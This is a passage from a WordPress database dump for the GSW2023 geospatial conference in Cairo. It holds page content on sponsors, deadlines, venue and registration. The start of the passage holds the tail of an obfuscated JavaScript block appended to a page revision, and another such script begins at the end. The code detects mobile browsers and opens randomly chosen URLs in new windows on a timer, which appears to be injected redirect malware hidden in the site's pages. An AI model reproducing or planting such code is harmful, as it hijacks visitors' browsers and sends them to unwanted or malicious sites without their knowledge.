)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-05-17 06:33:04','2023-05-17 06:33:04','',3066,'https://gsw2023.com/?p=4545',0,'revision','',0),
(4546,1,'2023-05-17 06:33:44','2023-05-17 06:33:44','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305146113{margin-top: 0px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3287|url^https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg|caption^null|alt^null|title^intercontinental-cairo-7836282477-2x1|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #f7f763;\"><strong><span style=\"font-size: 24pt;\">BOOK YOUR HOTEL NOW</span></strong></span></h4>\n<h4></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">(InterContinental Cairo Semiramis)</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #000080; font-size: 24pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684303522001{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 